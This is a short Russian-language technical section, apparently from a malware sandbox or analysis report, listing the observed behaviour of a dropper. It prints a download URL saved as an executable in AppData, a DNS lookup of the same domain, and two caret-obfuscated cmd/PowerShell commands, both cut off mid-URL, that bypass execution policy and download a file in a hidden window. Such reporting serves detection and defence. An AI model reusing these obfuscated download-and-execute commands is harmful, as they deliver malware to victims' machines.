Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeR^She^LL.E^Xe -^EXEC^UtiOnpoLi^cy bY^pass^ -noPR^oFiL^E -w^In^dOwS^TY^L^E HiD^d^en^ (neW^-Ob^j^e^cT S^yStE^m.^n^eT^.webClI^eNt^).^Dow^NLO^adF^il^E^(^'http://smo...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "POWeR^She^LL.E^Xe -^EXEC^UtiOnpoLi^cy bY^pass^ -noPR^oFiL^E -w^In^dOwS^TY^L^E HiD^d^en^ (neW^-Ob^j^e^cT S^yStE^m.^n^eT^.webClI^eNt^).^Dow^NLO^adF^il^E^(^'http://smo...' (со скрытым окном)